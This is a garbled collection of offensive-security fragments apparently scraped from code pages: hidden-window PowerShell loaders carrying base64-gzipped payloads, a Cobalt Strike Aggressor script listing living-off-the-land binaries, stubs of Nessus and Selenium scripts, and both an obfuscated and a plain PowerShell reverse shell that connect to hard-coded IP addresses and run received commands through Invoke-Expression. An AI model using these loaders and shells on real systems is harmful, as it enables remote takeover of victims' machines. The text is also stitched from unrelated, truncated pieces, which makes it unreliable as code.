powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('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
frknozr / lolbin.cna
Lolbin Finder Aggressor
# Names of Windows executables commonly classed as living-off-the-land binaries (signed
# Microsoft tools that can launch or proxy other code). Presumably this is the list the
# `lolbin` alias below searches a host for; the alias body is truncated on this page, so
# how the names are matched (path, case) cannot be confirmed from here.
@lolbins = @("Atbroker.exe","Bash.exe","Bitsadmin.exe","Cmstp.exe","Diskshadow.exe","Dnscmd.exe","Extexport.exe","Forfiles.exe","Gpscript.exe","Hh.exe","Ie4unit.exe","Ieexec.exe","Infdefaultinstall.exe","Installutil.exe","Mavinject.exe","Microsoft.Workflow.Compiler.exe","Msbuild.exe","Msconfig.exe","Msdt.exe","Mshta.exe","Msiexec.exe","Odbcconf.exe","Pcalua.exe","Pcwrun.exe","Presentationhost.exe","Regasm.exe","Register-cimprovider.exe","Regsvcs.exe","Regsvr32.exe","Rundll32.exe","Runonce.exe","Runscripthelper.exe","Schtasks.exe","Scriptrunner.exe","SyncAppvPublishingServer.exe","Wab.exe","Wmic.exe","Xwizard.exe");
# Registers the Beacon console command "lolbin" with a one-line description and a
# multi-line help text (joined with Sleep's `.` string concatenation). The command
# takes no arguments per the syntax line.
beacon_command_register("lolbin", "Queries the System for all major lolbin products installed",
"Syntax: lolbin\n" .
"Checks for installed lolbin products");
alias lolbin {
$bid = $1;
$function = $2;
import requests
import json
from docx import Document
# API key pair. Both are empty here; the rest of this script is not shown on this
# page, so where (or whether) they are filled in is not visible.
A_KEY: str = ""
S_KEY: str = ""
# Authentication header sent with each request. NOTE(review): the header value is a
# hard-coded string with empty key fields and does not reference A_KEY / S_KEY above —
# presumably it was meant to be built from them, e.g.
# {"X-ApiKeys": f"accessKey={A_KEY}; secretKey={S_KEY}"}; confirm against the caller.
# Either way, keep real keys out of source (environment variable or a file outside the repo).
headers: dict[str, str] = {"X-ApiKeys": "accessKey=; secretKey="}
# Base URL of the scanner's REST API on the local host. The X-ApiKeys header and port
# 8834 look like the Tenable Nessus API — confirm.
BASE_URL: str = "https://localhost:8834"
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from time import sleep
# Chrome launch options. Headless mode is left commented out, so a browser window is shown.
options = Options()
#options.add_argument("--headless")
# NOTE(review): `chrome_options=` is the older Selenium keyword (newer releases expect
# `options=`), and executable_path="chromedriver" is resolved relative to the current
# working directory rather than a fixed path — verify against the Selenium version in use.
driver = webdriver.Chrome(chrome_options=options,executable_path="chromedriver")
# Credential input, space-separated username and password per the original author's note.
# Empty here; the remainder of the script is not shown on this page. Credentials are better
# read from the environment or a prompt than committed in the script.
user_pass: str = "" # space-separated
<?XML version="1.0"?>
<scriptlet>
<registration remotable="True" version="1.0" desription="desription">
<script language="VBScript">
<![CDATA[
Msgbox("Message")
]]>
&('Sv') ("{0}{1}"-f 'Lh','aW3') ( [TypE]("{3}{1}{0}{2}" -F 'ENcOdI','ExT.','ng','T') ); ${CLi`E`NT} = &("{1}{0}{2}"-f '-Obje','New','ct') ("{0}{2}{1}{3}{4}"-f'System.Ne','s.T','t.Socket','CPCli','ent')(("{2}{0}{1}"-f '4.194','.214.53','5'),443);${str`E`AM} = ${Cl`i`EnT}.("{0}{2}{1}" -f'GetSt','m','rea').Invoke();[byte[]]${B`yTEs} = 0..65535|&('%'){0};while((${i} = ${sTr`eaM}.("{1}{0}"-f 'd','Rea').Invoke(${B`yT`eS}, 0, ${b`yt`eS}."le`NgTh")) -ne 0){;${d`Ata} = (.("{1}{0}{2}" -f 'ew-Obj','N','ect') -TypeName ("{5}{2}{4}{3}{0}{1}"-f'IEnco','ding','ystem.Text.','SCI','A','S')).("{1}{0}{3}{2}" -f'e','G','ing','tStr').Invoke(${b`y`TES},0, ${I});${Se`Nd`BAcK} = (.("{1}{0}"-f'x','ie') ${d`ATa} 2>&1 | &("{2}{0}{1}"-f'S','tring','Out-') );${sE`NDBAc`K2} = ${S`END`BacK} + "PS " + (&("{1}{0}"-f'wd','p'))."p`AtH" + "> ";${sE`N`DbyTE} = ( ( .('LS') ("{2}{1}{3}{0}{4}"-f 'ble:L','i','var','a','HAW3') )."v`ALuE"::"A`Scii").("{0}{1}"-f 'Get','Bytes').Invoke(${SEndb`A`c`k2});${sTRe`Am}.("{0}{1}"-f 'W','rite').Invoke($
powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('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
powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIANOxYVoCA51W227bOBB991cMvNpaQixCcdvdIECKdZW0DZC2RuVtHgwDoaVxrI1MuiTlCxL/e0mJsuQ4QZvViy1yeObMmQv1Bwz4CsU0Z+DDtUiVQgaTDbzXP8NcMBTwCs7pEuETFcmm1dKWsUo5g4+o/GucxFmKTEHrvgX6cVYxnMEXXPlfJ/9hrMAfbhb4hc5RLyqi7cPCvjIm/0o8xynNMxUKTPROSjOpIRwlctxZDQRfb8gjC73eWKlsW9ua4qIKrXUPxf6ACjp3y/+jSImU3Y6dkM/nlCXd/dVIZjFnjxbP+YplnCbFqmcxBY9RSrACzHmSZ2gI/uN6UJqkU3ArN+DjD2hPUpa0vWKzPFeczVKp5deSn2mXG/1/ToxqEY/vUEkyjBdX1mJ8EpwEhweJVFQo49d6LnZtis4adv04xoXSgGU63JLK9jm6ApcoJB4y3kE3Uv4U83BgHbVfvyG9N6/J8d9vyclf7a6JwzpvlQJKJZDODdsSnOhCi4o1zbLmV+anpGdqpW3T0SAnZRZVYM/wwzjXNb8hUWXqWv9dZ6qLCrvuvTPU6FvwqYTR3plvOOcKQxQqnaYxVfidZmlCTeWFNMsmNL4be94TdEg/VzNTtuZQXz6tjNdIYC1JHVJTs9Fko3A0Hjvm15ReQEgv0M/Dn/fB1sqKLKm23ZHCtSLIYp6Yuj497Ufh5aVnpH5vbNz2tS5QvpLldIhmmGUgcsa0NWghcqmLtA1H4CBbnpo3Zlr8SK/pnOw2Yj5f5KrevGEhX2xEejtT4IYe9ILjt/A5jQWXfKog5GLBRSEggb7xaCwlCNQOl
#A simple and small reverse shell. Options and help removed to save space.
#Uncomment and change the hardcoded IP address and port number in the below line. Remove all help comments as well.
# For anyone triaging this line: it opens a plaintext TCP connection to the hard-coded
# address and port, reads whatever the remote side sends into a 64 KiB buffer (0..65535),
# runs that text through Invoke-Expression (`iex`), and writes the command output followed
# by a "PS <cwd>> " prompt back to the socket until Read() returns 0 (remote side closed).
# Nothing is encrypted or authenticated.
# Detection note: Net.Sockets.TCPClient combined with Invoke-Expression on socket data is
# visible in PowerShell script-block logging (event 4104) even when delivered as a one-liner.
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.126",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
# Commented-out shorter variant of the same loop: same read/iex/write cycle against a
# different hard-coded address and port, but no prompt is appended to the output.
#$sm=(New-Object Net.Sockets.TCPClient("192.168.254.1",55555)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}
vjTNELvUZXQAAAAAAAAClyVJtWzyZP1GJDNuHYs_9-MS182GzoVSkvYFYmH2-lOI